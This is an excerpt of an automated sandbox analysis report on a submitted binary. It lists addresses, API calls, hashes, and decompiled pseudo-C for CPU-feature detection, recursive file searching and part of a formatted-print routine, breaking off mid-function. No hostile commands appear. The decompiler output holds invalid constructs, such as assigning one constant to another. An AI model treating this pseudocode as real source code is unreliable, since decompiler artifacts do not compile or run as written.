                                                0x001b834a
                                                0x001b8339
                                                0x001b833b
                                                0x001b833b
                                                0x001b8339
                                                0x00000000
                                                0x001b832a
                                                0x001b8227
                                                0x001b8235
                                                0x001b823d
                                                0x00000000
                                                0x001b823d
                                                0x001b822b
                                                0x001b8230
                                                0x001b8230
                                                0x00000000
                                                0x001b822b
                                                0x001b81e8
                                                0x001b81f6
                                                0x001b81fe
                                                0x00000000
                                                0x001b81fe
                                                0x001b81ec
                                                0x001b81f1
                                                0x001b81f1
                                                0x001b81ec

                                                APIs
                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001B80B0,?,?,00000008,?,?,001C4597,00000000), ref: 001B82E2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                • Opcode ID: 7a9434349c240e49859974f5e98352435f97eba6c5c5b6f308bfb12ab9d105c8
                                                • Instruction ID: cde5eacfcd0060c9292fc4ed64dd1114ef53c09e27f567cd2657a3648d8a741e
                                                • Opcode Fuzzy Hash: 7a9434349c240e49859974f5e98352435f97eba6c5c5b6f308bfb12ab9d105c8
                                                • Instruction Fuzzy Hash: 92B15D31610608CFD718CF2CC486BA57BE5FF45764F298698E99ACF2A1C735E982CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E001A9B4C(signed int __edx) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				intOrPtr _t60;
                                                				signed int _t61;
                                                				signed int _t62;
                                                				signed int _t63;
                                                				signed int _t66;
                                                				signed int _t67;
                                                				signed int _t73;
                                                				intOrPtr _t74;
                                                				intOrPtr _t75;
                                                				intOrPtr* _t77;
                                                				signed int _t78;
                                                				intOrPtr* _t82;
                                                				signed int _t85;
                                                				signed int _t90;
                                                				intOrPtr* _t93;
                                                				signed int _t96;
                                                				signed int _t99;
                                                				signed int _t104;
                                                
                                                				_t90 = __edx;
                                                				 *0x202a9c =  *0x202a9c & 0x00000000;
                                                				 *0x1d5020 =  *0x1d5020 | 0x00000001;
                                                				if(IsProcessorFeaturePresent(0xa) == 0) {
                                                					L23:
                                                					return 0;
                                                				}
                                                				_v20 = _v20 & 0x00000000;
                                                				_push(_t74);
                                                				_t93 =  &_v40;
                                                				asm("cpuid");
                                                				_t75 = _t74;
                                                				 *_t93 = 0;
                                                				 *((intOrPtr*)(_t93 + 4)) = _t74;
                                                				 *((intOrPtr*)(_t93 + 8)) = 0;
                                                				 *(_t93 + 0xc) = _t90;
                                                				_v16 = _v40;
                                                				_v8 = _v28 ^ 0x49656e69;
                                                				_v12 = _v32 ^ 0x6c65746e;
                                                				_push(_t75);
                                                				asm("cpuid");
                                                				_t77 =  &_v40;
                                                				 *_t77 = 1;
                                                				 *((intOrPtr*)(_t77 + 4)) = _t75;
                                                				 *((intOrPtr*)(_t77 + 8)) = 0;
                                                				 *(_t77 + 0xc) = _t90;
                                                				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
                                                					L9:
                                                					_t96 =  *0x202aa0; // 0x2
                                                					L10:
                                                					_t85 = _v32;
                                                					_t60 = 7;
                                                					_v8 = _t85;
                                                					if(_v16 < _t60) {
                                                						_t78 = _v20;
                                                					} else {
                                                						_push(_t77);
                                                						asm("cpuid");
                                                						_t82 =  &_v40;
                                                						 *_t82 = _t60;
                                                						 *((intOrPtr*)(_t82 + 4)) = _t77;
                                                						 *((intOrPtr*)(_t82 + 8)) = 0;
                                                						_t85 = _v8;
                                                						 *(_t82 + 0xc) = _t90;
                                                						_t78 = _v36;
                                                						if((_t78 & 0x00000200) != 0) {
                                                							 *0x202aa0 = _t96 | 0x00000002;
                                                						}
                                                					}
                                                					_t61 =  *0x1d5020; // 0x6f
                                                					_t62 = _t61 | 0x00000002;
                                                					 *0x202a9c = 1;
                                                					 *0x1d5020 = _t62;
                                                					if((_t85 & 0x00100000) != 0) {
                                                						_t63 = _t62 | 0x00000004;
                                                						 *0x202a9c = 2;
                                                						 *0x1d5020 = _t63;
                                                						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
                                                							asm("xgetbv");
                                                							_v24 = _t63;
                                                							_v20 = _t90;
                                                							_t104 = 6;
                                                							if((_v24 & _t104) == _t104) {
                                                								_t66 =  *0x1d5020; // 0x6f
                                                								_t67 = _t66 | 0x00000008;
                                                								 *0x202a9c = 3;
                                                								 *0x1d5020 = _t67;
                                                								if((_t78 & 0x00000020) != 0) {
                                                									 *0x202a9c = 5;
                                                									 *0x1d5020 = _t67 | 0x00000020;
                                                									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
                                                										 *0x1d5020 =  *0x1d5020 | 0x00000040;
                                                										 *0x202a9c = _t104;
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                					goto L23;
                                                				}
                                                				_t73 = _v40 & 0x0fff3ff0;
                                                				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
                                                					_t99 =  *0x202aa0; // 0x2
                                                					_t96 = _t99 | 0x00000001;
                                                					 *0x202aa0 = _t96;
                                                					goto L10;
                                                				} else {
                                                					goto L9;
                                                				}
                                                			}






























                                                0x001a9b4c
                                                0x001a9b4f
                                                0x001a9b59
                                                0x001a9b6a
                                                0x001a9d1c
                                                0x001a9d1f
                                                0x001a9d1f
                                                0x001a9b70
                                                0x001a9b76
                                                0x001a9b7b
                                                0x001a9b7f
                                                0x001a9b83
                                                0x001a9b85
                                                0x001a9b87
                                                0x001a9b8a
                                                0x001a9b8f
                                                0x001a9b98
                                                0x001a9ba9
                                                0x001a9bb4
                                                0x001a9bba
                                                0x001a9bbb
                                                0x001a9bc1
                                                0x001a9bc4
                                                0x001a9bce
                                                0x001a9bd1
                                                0x001a9bd4
                                                0x001a9bd7
                                                0x001a9c1c
                                                0x001a9c1c
                                                0x001a9c22
                                                0x001a9c22
                                                0x001a9c27
                                                0x001a9c28
                                                0x001a9c2e
                                                0x001a9c60
                                                0x001a9c30
                                                0x001a9c32
                                                0x001a9c33
                                                0x001a9c39
                                                0x001a9c3c
                                                0x001a9c3e
                                                0x001a9c41
                                                0x001a9c44
                                                0x001a9c47
                                                0x001a9c4a
                                                0x001a9c53
                                                0x001a9c58
                                                0x001a9c58
                                                0x001a9c53
                                                0x001a9c63
                                                0x001a9c68
                                                0x001a9c6b
                                                0x001a9c75
                                                0x001a9c80
                                                0x001a9c86
                                                0x001a9c89
                                                0x001a9c93
                                                0x001a9c9e
                                                0x001a9caa
                                                0x001a9cad
                                                0x001a9cb0
                                                0x001a9cbb
                                                0x001a9cc0
                                                0x001a9cc2
                                                0x001a9cc7
                                                0x001a9cca
                                                0x001a9cd4
                                                0x001a9cdc
                                                0x001a9ce1
                                                0x001a9ceb
                                                0x001a9cf9
                                                0x001a9d0c
                                                0x001a9d13
                                                0x001a9d13
                                                0x001a9cf9
                                                0x001a9cdc
                                                0x001a9cc0
                                                0x001a9c9e
                                                0x00000000
                                                0x001a9d1b
                                                0x001a9bdc
                                                0x001a9be6
                                                0x001a9c0b
                                                0x001a9c11
                                                0x001a9c14
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 001A9B62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: FeaturePresentProcessor
                                                • String ID:
                                                • API String ID: 2325560087-0
                                                • Opcode ID: e5ced0aaf6a8744add72c6bfefec8e50c78d8244647314e56986817c58e13a35
                                                • Instruction ID: b2c764097ea0c9f7071a6ef2427dfb2552b015947b6c9e3654ad0ae0a01f7c8d
                                                • Opcode Fuzzy Hash: e5ced0aaf6a8744add72c6bfefec8e50c78d8244647314e56986817c58e13a35
                                                • Instruction Fuzzy Hash: 9551A0B6E01B05CFEB24CF59E8857AABBF1FB49324F24806AD405EB255D3749980CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E001BE3A0(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				intOrPtr* _v28;
                                                				intOrPtr* _v32;
                                                				intOrPtr _v36;
                                                				signed int _v48;
                                                				struct _WIN32_FIND_DATAW _v604;
                                                				char _v605;
                                                				void* _v612;
                                                				signed int _v616;
                                                				union _FINDEX_INFO_LEVELS _v620;
                                                				union _FINDEX_INFO_LEVELS _v624;
                                                				signed int _v628;
                                                				union _FINDEX_INFO_LEVELS _v632;
                                                				char _v636;
                                                				signed int _v640;
                                                				union _FINDEX_INFO_LEVELS _v644;
                                                				union _FINDEX_INFO_LEVELS _v648;
                                                				signed int _v652;
                                                				union _FINDEX_INFO_LEVELS _v656;
                                                				char _v660;
                                                				signed int _v664;
                                                				signed int _v668;
                                                				signed int _v672;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr _t72;
                                                				signed int _t77;
                                                				signed int _t79;
                                                				char _t81;
                                                				signed char _t82;
                                                				signed int _t88;
                                                				signed int _t94;
                                                				signed int _t100;
                                                				signed int _t103;
                                                				signed int _t104;
                                                				signed int _t106;
                                                				intOrPtr* _t112;
                                                				signed int _t115;
                                                				intOrPtr _t125;
                                                				signed int _t127;
                                                				signed int _t130;
                                                				signed int _t132;
                                                				void* _t135;
                                                				void* _t137;
                                                				intOrPtr _t139;
                                                				intOrPtr* _t142;
                                                				signed int _t144;
                                                				void* _t146;
                                                				intOrPtr* _t147;
                                                				signed int _t156;
                                                				void* _t164;
                                                				signed int _t167;
                                                				intOrPtr _t169;
                                                				void* _t170;
                                                				void* _t173;
                                                				void* _t174;
                                                				void* _t175;
                                                				signed int _t176;
                                                				signed int _t177;
                                                				signed int _t180;
                                                				void* _t181;
                                                				signed int _t182;
                                                				void* _t183;
                                                				void* _t184;
                                                
                                                				_push(__ecx);
                                                				_t142 = _a4;
                                                				_t2 = _t142 + 1; // 0x1
                                                				_t164 = _t2;
                                                				do {
                                                					_t72 =  *_t142;
                                                					_t142 = _t142 + 1;
                                                				} while (_t72 != 0);
                                                				_t167 = _a12;
                                                				_t144 = _t142 - _t164 + 1;
                                                				_v8 = _t144;
                                                				if(_t144 <=  !_t167) {
                                                					_t5 = _t167 + 1; // 0x1
                                                					_t135 = _t5 + _t144;
                                                					_t174 = E001B6392(_t135, 1);
                                                					_t146 = _t173;
                                                					__eflags = _t167;
                                                					if(_t167 == 0) {
                                                						L7:
                                                						_push(_v8);
                                                						_t135 = _t135 - _t167;
                                                						_t77 = E001C3D34(_t146, _t174 + _t167, _t135, _a4);
                                                						_t182 = _t181 + 0x10;
                                                						__eflags = _t77;
                                                						if(_t77 != 0) {
                                                							goto L12;
                                                						} else {
                                                							_t139 = _a16;
                                                							_t127 = E001BE73B(_t139);
                                                							_v8 = _t127;
                                                							__eflags = _t127;
                                                							if(_t127 == 0) {
                                                								 *( *(_t139 + 4)) = _t174;
                                                								_t177 = 0;
                                                								_t14 = _t139 + 4;
                                                								 *_t14 =  *(_t139 + 4) + 4;
                                                								__eflags =  *_t14;
                                                							} else {
                                                								E001B63EF(_t174);
                                                								_t177 = _v8;
                                                							}
                                                							E001B63EF(0);
                                                							_t130 = _t177;
                                                							goto L4;
                                                						}
                                                					} else {
                                                						_push(_t167);
                                                						_t132 = E001C3D34(_t146, _t174, _t135, _a8);
                                                						_t182 = _t181 + 0x10;
                                                						__eflags = _t132;
                                                						if(_t132 != 0) {
                                                							L12:
                                                							_push(0);
                                                							_push(0);
                                                							_push(0);
                                                							_push(0);
                                                							_push(0);
                                                							E001AFE70();
                                                							asm("int3");
                                                							_t180 = _t182;
                                                							_t183 = _t182 - 0x298;
                                                							_t79 =  *0x1d5010; // 0x8121a627
                                                							_v48 = _t79 ^ _t180;
                                                							_t147 = _v32;
                                                							_t165 = _v28;
                                                							_push(_t135);
                                                							_push(0);
                                                							_t169 = _v36;
                                                							_v648 = _t165;
                                                							__eflags = _t147 - _t169;
                                                							if(_t147 != _t169) {
                                                								while(1) {
                                                									_t125 =  *_t147;
                                                									__eflags = _t125 - 0x2f;
                                                									if(_t125 == 0x2f) {
                                                										break;
                                                									}
                                                									__eflags = _t125 - 0x5c;
                                                									if(_t125 != 0x5c) {
                                                										__eflags = _t125 - 0x3a;
                                                										if(_t125 != 0x3a) {
                                                											_t147 = E001C4C00(_t169, _t147);
                                                											__eflags = _t147 - _t169;
                                                											if(_t147 != _t169) {
                                                												continue;
                                                											}
                                                										}
                                                									}
                                                									break;
                                                								}
                                                								_t165 = _v612;
                                                							}
                                                							_t81 =  *_t147;
                                                							_v605 = _t81;
                                                							__eflags = _t81 - 0x3a;
                                                							if(_t81 != 0x3a) {
                                                								L23:
                                                								__eflags = _t81 - 0x2f;
                                                								if(__eflags == 0) {
                                                									L26:
                                                									_t82 = 1;
                                                								} else {
                                                									__eflags = _t81 - 0x5c;
                                                									if(__eflags == 0) {
                                                										goto L26;
                                                									} else {
                                                										__eflags = _t81 - 0x3a;
                                                										_t82 = 0;
                                                										if(__eflags == 0) {
                                                											goto L26;
                                                										}
                                                									}
                                                								}
                                                								_v660 = 0;
                                                								_v656 = 0;
                                                								_push(_t174);
                                                								asm("sbb eax, eax");
                                                								_v652 = 0;
                                                								_v648 = 0;
                                                								_v664 =  ~(_t82 & 0x000000ff) & _t147 - _t169 + 0x00000001;
                                                								_v644 = 0;
                                                								_v640 = 0;
                                                								_t88 = E001B325F(_t147 - _t169 + 1, _t169,  &_v660, E001BDFAA(__eflags));
                                                								_t184 = _t183 + 0xc;
                                                								asm("sbb eax, eax");
                                                								_t175 = FindFirstFileExW( !( ~_t88) & _v652, 0,  &_v604, 0, 0, 0);
                                                								__eflags = _t175 - 0xffffffff;
                                                								if(_t175 != 0xffffffff) {
                                                									_t151 = _v612;
                                                									_t94 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
                                                									__eflags = _t94;
                                                									_v668 = _t94 >> 2;
                                                									do {
                                                										_v636 = 0;
                                                										_v632 = 0;
                                                										_v628 = 0;
                                                										_v624 = 0;
                                                										_v620 = 0;
                                                										_v616 = 0;
                                                										_t100 = E001BE15D( &(_v604.cFileName),  &_v636,  &_v605, E001BDFAA(__eflags));
                                                										_t184 = _t184 + 0x10;
                                                										asm("sbb eax, eax");
                                                										_t103 =  !( ~_t100) & _v628;
                                                										__eflags =  *_t103 - 0x2e;
                                                										if( *_t103 != 0x2e) {
                                                											L36:
                                                											_push(_v612);
                                                											_t104 = E001BE3A0(_t151, _t103, _t169, _v664);
                                                											_t184 = _t184 + 0x10;
                                                											_v672 = _t104;
                                                											__eflags = _t104;
                                                											if(_t104 != 0) {
                                                												__eflags = _v616;
                                                												if(_v616 != 0) {
                                                													E001B63EF(_v628);
                                                												}
                                                												FindClose(_t175);
                                                												__eflags = _v640;
                                                												if(_v640 != 0) {
                                                													E001B63EF(_v652);
                                                												}
                                                												_t106 = _v672;
                                                											} else {
                                                												goto L37;
                                                											}
                                                										} else {
                                                											_t151 =  *((intOrPtr*)(_t103 + 1));
                                                											__eflags = _t151;
                                                											if(_t151 == 0) {
                                                												goto L37;
                                                											} else {
                                                												__eflags = _t151 - 0x2e;
                                                												if(_t151 != 0x2e) {
                                                													goto L36;
                                                												} else {
                                                													__eflags =  *(_t103 + 2);
                                                													if( *(_t103 + 2) == 0) {
                                                														goto L37;
                                                													} else {
                                                														goto L36;
                                                													}
                                                												}
                                                											}
                                                										}
                                                										goto L50;
                                                										L37:
                                                										__eflags = _v616;
                                                										if(_v616 != 0) {
                                                											E001B63EF(_v628);
                                                											_pop(_t151);
                                                										}
                                                										__eflags = FindNextFileW(_t175,  &_v604);
                                                									} while (__eflags != 0);
                                                									_t112 = _v612;
                                                									_t156 = _v668;
                                                									_t165 =  *_t112;
                                                									_t115 =  *((intOrPtr*)(_t112 + 4)) -  *_t112 >> 2;
                                                									__eflags = _t156 - _t115;
                                                									if(_t156 != _t115) {
                                                										__eflags = _t115 - _t156;
                                                										E001C46D0(_t165, _t165 + _t156 * 4, _t115 - _t156, 4, E001BE145);
                                                									}
                                                									FindClose(_t175);
                                                									__eflags = _v640;
                                                									if(_v640 != 0) {
                                                										E001B63EF(_v652);
                                                									}
                                                									_t106 = 0;
                                                								} else {
                                                									_push(_v612);
                                                									_t176 = E001BE3A0( &_v604, _t169, 0, 0);
                                                									__eflags = _v640;
                                                									if(_v640 != 0) {
                                                										E001B63EF(_v652);
                                                									}
                                                									_t106 = _t176;
                                                								}
                                                								L50:
                                                								_pop(_t174);
                                                							} else {
                                                								__eflags = _t147 - _t169 + 1;
                                                								if(_t147 == _t169 + 1) {
                                                									_t81 = _v605;
                                                									goto L23;
                                                								} else {
                                                									_push(_t165);
                                                									_t106 = E001BE3A0(_t147, _t169, 0, 0);
                                                								}
                                                							}
                                                							_pop(_t170);
                                                							__eflags = _v12 ^ _t180;
                                                							_pop(_t137);
                                                							return E001A9545(_t106, _t137, _v12 ^ _t180, _t165, _t170, _t174);
                                                						} else {
                                                							goto L7;
                                                						}
                                                					}
                                                				} else {
                                                					_t130 = 0xc;
                                                					L4:
                                                					return _t130;
                                                				}
                                                			}





































































                                                0x001be3a5
                                                0x001be3a6
                                                0x001be3a9
                                                0x001be3a9
                                                0x001be3ac
                                                0x001be3ac
                                                0x001be3ae
                                                0x001be3af
                                                0x001be3b4
                                                0x001be3bb
                                                0x001be3be
                                                0x001be3c3
                                                0x001be3cd
                                                0x001be3d0
                                                0x001be3da
                                                0x001be3dd
                                                0x001be3de
                                                0x001be3e0
                                                0x001be3f4
                                                0x001be3f4
                                                0x001be3f7
                                                0x001be401
                                                0x001be406
                                                0x001be409
                                                0x001be40b
                                                0x00000000
                                                0x001be40d
                                                0x001be40d
                                                0x001be412
                                                0x001be419
                                                0x001be41c
                                                0x001be41e
                                                0x001be42f
                                                0x001be431
                                                0x001be433
                                                0x001be433
                                                0x001be433
                                                0x001be420
                                                0x001be421
                                                0x001be426
                                                0x001be429
                                                0x001be438
                                                0x001be43e
                                                0x00000000
                                                0x001be441
                                                0x001be3e2
                                                0x001be3e2
                                                0x001be3e8
                                                0x001be3ed
                                                0x001be3f0
                                                0x001be3f2
                                                0x001be444
                                                0x001be446
                                                0x001be447
                                                0x001be448
                                                0x001be449
                                                0x001be44a
                                                0x001be44b
                                                0x001be450
                                                0x001be454
                                                0x001be456
                                                0x001be45c
                                                0x001be463
                                                0x001be466
                                                0x001be469
                                                0x001be46c
                                                0x001be46d
                                                0x001be46e
                                                0x001be471
                                                0x001be477
                                                0x001be479
                                                0x001be47b
                                                0x001be47b
                                                0x001be47d
                                                0x001be47f
                                                0x00000000
                                                0x00000000
                                                0x001be481
                                                0x001be483
                                                0x001be485
                                                0x001be487
                                                0x001be492
                                                0x001be494
                                                0x001be496
                                                0x00000000
                                                0x00000000
                                                0x001be496
                                                0x001be487
                                                0x00000000
                                                0x001be483
                                                0x001be498
                                                0x001be498
                                                0x001be49e
                                                0x001be4a0
                                                0x001be4a6
                                                0x001be4a8
                                                0x001be4ca
                                                0x001be4cc
                                                0x001be4ce
                                                0x001be4da
                                                0x001be4da
                                                0x001be4d0
                                                0x001be4d0
                                                0x001be4d2
                                                0x00000000
                                                0x001be4d4
                                                0x001be4d4
                                                0x001be4d6
                                                0x001be4d8
                                                0x00000000
                                                0x00000000
                                                0x001be4d8
                                                0x001be4d2
                                                0x001be4e2
                                                0x001be4ea
                                                0x001be4f0
                                                0x001be4f1
                                                0x001be4f3
                                                0x001be4fb
                                                0x001be501
                                                0x001be507
                                                0x001be50d
                                                0x001be521
                                                0x001be526
                                                0x001be531
                                                0x001be547
                                                0x001be549
                                                0x001be54c
                                                0x001be57c
                                                0x001be585
                                                0x001be585
                                                0x001be58a
                                                0x001be590
                                                0x001be590
                                                0x001be596
                                                0x001be59c
                                                0x001be5a2
                                                0x001be5a8
                                                0x001be5ae
                                                0x001be5cf
                                                0x001be5d4
                                                0x001be5d9
                                                0x001be5dd
                                                0x001be5e3
                                                0x001be5e6
                                                0x001be5f9
                                                0x001be5f9
                                                0x001be607
                                                0x001be60c
                                                0x001be60f
                                                0x001be615
                                                0x001be617
                                                0x001be692
                                                0x001be698
                                                0x001be6a0
                                                0x001be6a5
                                                0x001be6a7
                                                0x001be6ad
                                                0x001be6b3
                                                0x001be6bb
                                                0x001be6c0
                                                0x001be6c1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001be5e8
                                                0x001be5e8
                                                0x001be5eb
                                                0x001be5ed
                                                0x00000000
                                                0x001be5ef
                                                0x001be5ef
                                                0x001be5f2
                                                0x00000000
                                                0x001be5f4
                                                0x001be5f4
                                                0x001be5f7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001be5f7
                                                0x001be5f2
                                                0x001be5ed
                                                0x00000000
                                                0x001be619
                                                0x001be619
                                                0x001be61f
                                                0x001be627
                                                0x001be62c
                                                0x001be62c
                                                0x001be63b
                                                0x001be63b
                                                0x001be643
                                                0x001be649
                                                0x001be64f
                                                0x001be656
                                                0x001be659
                                                0x001be65b
                                                0x001be662
                                                0x001be66b
                                                0x001be670
                                                0x001be674
                                                0x001be67a
                                                0x001be680
                                                0x001be688
                                                0x001be68d
                                                0x001be68e
                                                0x001be54e
                                                0x001be54e
                                                0x001be55f
                                                0x001be561
                                                0x001be567
                                                0x001be56f
                                                0x001be574
                                                0x001be575
                                                0x001be575
                                                0x001be6c7
                                                0x001be6c7
                                                0x001be4aa
                                                0x001be4ad
                                                0x001be4af
                                                0x001be4c4
                                                0x00000000
                                                0x001be4b1
                                                0x001be4b1
                                                0x001be4b7
                                                0x001be4bc
                                                0x001be4af
                                                0x001be6cb
                                                0x001be6cc
                                                0x001be6ce
                                                0x001be6d5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001be3f2
                                                0x001be3c5
                                                0x001be3c7
                                                0x001be3c8
                                                0x001be3ca
                                                0x001be3ca

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d1b928c04f3eaa701609f77471d0e7b443e0387924ce326245d20489f6d0b744
                                                • Instruction ID: 729fbd937f7553ffe03015dd3296aee3c106c714c391e5c9b4268e7e009b80a2
                                                • Opcode Fuzzy Hash: d1b928c04f3eaa701609f77471d0e7b443e0387924ce326245d20489f6d0b744
                                                • Instruction Fuzzy Hash: 3241BFB5804219AFCB20DF69CC89AEABBF9AF55300F1442DDE41DD3211EB359E858F50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 89%
                                                			E001AF192(signed int __ecx, signed int __edx, void* __edi) {
                                                				signed int _v8;
                                                				char _v16;
                                                				signed int _v18;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int* _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				void* __ebx;
                                                				void* __esi;
                                                				signed int _t115;
                                                				char _t117;
                                                				signed int _t118;
                                                				void* _t119;
                                                				signed int _t120;
                                                				signed char _t123;
                                                				signed int _t127;
                                                				signed char _t132;
                                                				signed char _t135;
                                                				signed int* _t141;
                                                				signed int _t145;
                                                				signed int _t149;
                                                				signed int _t150;
                                                				signed int* _t156;
                                                				signed int _t158;
                                                				signed int _t159;
                                                				signed int* _t160;
                                                				signed int* _t166;
                                                				signed char _t169;
                                                				signed char _t171;
                                                				signed int _t173;
                                                				signed int _t175;
                                                				signed int _t176;
                                                				signed int _t179;
                                                				signed int _t180;
                                                				signed int* _t181;
                                                				void* _t183;
                                                				signed int _t187;
                                                				unsigned int _t190;
                                                				signed int _t192;
                                                				signed int** _t193;
                                                				signed short* _t194;
                                                				signed char _t197;
                                                				signed int _t198;
                                                				signed int _t199;
                                                				intOrPtr _t211;
                                                				signed int _t214;
                                                				void* _t215;
                                                				signed int* _t216;
                                                				signed int _t217;
                                                				signed int _t218;
                                                				signed int** _t219;
                                                				signed int _t220;
                                                				void* _t221;
                                                				void* _t222;
                                                				void* _t223;
                                                
                                                				_t215 = __edi;
                                                				_t208 = __edx;
                                                				_t115 =  *0x1d5010; // 0x8121a627
                                                				_v8 = _t115 ^ _t220;
                                                				_t218 = __ecx;
                                                				_t179 = 0;
                                                				_v32 = __ecx;
                                                				_t183 = 0x58;
                                                				_t117 =  *((char*)(__ecx + 0x2d));
                                                				_t222 = _t117 - 0x64;
                                                				if(_t222 > 0) {
                                                					__eflags = _t117 - 0x70;
                                                					if(__eflags > 0) {
                                                						_t118 = _t117 - 0x73;
                                                						__eflags = _t118;
                                                						if(_t118 == 0) {
                                                							L9:
                                                							_t119 = E001AF8A4(_t218);
                                                							L10:
                                                							if(_t119 != 0) {
                                                								__eflags =  *((intOrPtr*)(_t218 + 0x2c)) - _t179;
                                                								if( *((intOrPtr*)(_t218 + 0x2c)) != _t179) {
                                                									L104:
                                                									_t120 = 1;
                                                									L105:
                                                									return E001A9545(_t120, _t179, _v8 ^ _t220, _t208, _t215, _t218);
                                                								}
                                                								_t123 =  *(_t218 + 0x1c) >> 4;
                                                								_v20 = _t179;
                                                								_t187 = _t179;
                                                								_v18 = _t179;
                                                								_v28 = _t187;
                                                								__eflags = 1 & _t123;
                                                								if((1 & _t123) == 0) {
                                                									L44:
                                                									_t211 =  *((intOrPtr*)(_t218 + 0x2d));
                                                									__eflags = _t211 - 0x78;
                                                									if(_t211 == 0x78) {
                                                										L46:
                                                										__eflags = 1;
                                                										if(1 != 0) {
                                                											L48:
                                                											__eflags = _t211 - 0x61;
                                                											if(_t211 == 0x61) {
                                                												L50:
                                                												_t127 = 1;
                                                												L51:
                                                												__eflags = _t127;
                                                												if(_t127 != 0) {
                                                													L53:
                                                													 *((char*)(_t220 + _t187 - 0x10)) = 0x30;
                                                													__eflags = _t211 - 0x58;
                                                													if(_t211 == 0x58) {
                                                														L56:
                                                														0x78 = 0x58;
                                                														L57:
                                                														 *((char*)(_t220 + _t187 - 0xf)) = 0x78;
                                                														_t187 = _t187 + 2;
                                                														__eflags = _t187;
                                                														_v28 = _t187;
                                                														L58:
                                                														_t208 =  *((intOrPtr*)(_t218 + 0x20)) -  *((intOrPtr*)(_t218 + 0x34)) - _t187;
                                                														__eflags =  *(_t218 + 0x1c) & 0x0000000c;
                                                														_push(_t215);
                                                														_v36 = _t208;
                                                														if(( *(_t218 + 0x1c) & 0x0000000c) != 0) {
                                                															L70:
                                                															_push( *((intOrPtr*)(_t218 + 8)));
                                                															_t216 = _t218 + 0x14;
                                                															_v28 = _t218 + 0x448;
                                                															E001AFA17(_t218 + 0x448,  &_v20, _t187, _t216);
                                                															_t190 =  *(_t218 + 0x1c);
                                                															_t132 = _t190 >> 3;
                                                															__eflags = _t132 & 0x00000001;
                                                															if((_t132 & 0x00000001) == 0) {
                                                																L83:
                                                																__eflags =  *((char*)(_t218 + 0x38));
                                                																if( *((char*)(_t218 + 0x38)) == 0) {
                                                																	L91:
                                                																	_push( *((intOrPtr*)(_t218 + 8)));
                                                																	E001AFA17(_t218 + 0x448,  *(_t218 + 0x30),  *((intOrPtr*)(_t218 + 0x34)), _t216);
                                                																	L92:
                                                																	_t192 =  *_t216;
                                                																	__eflags = _t192;
                                                																	if(_t192 < 0) {
                                                																		L103:
                                                																		_pop(_t215);
                                                																		goto L104;
                                                																	}
                                                																	_t135 =  *(_t218 + 0x1c) >> 2;
                                                																	__eflags = _t135 & 0x00000001;
                                                																	if((_t135 & 0x00000001) == 0) {
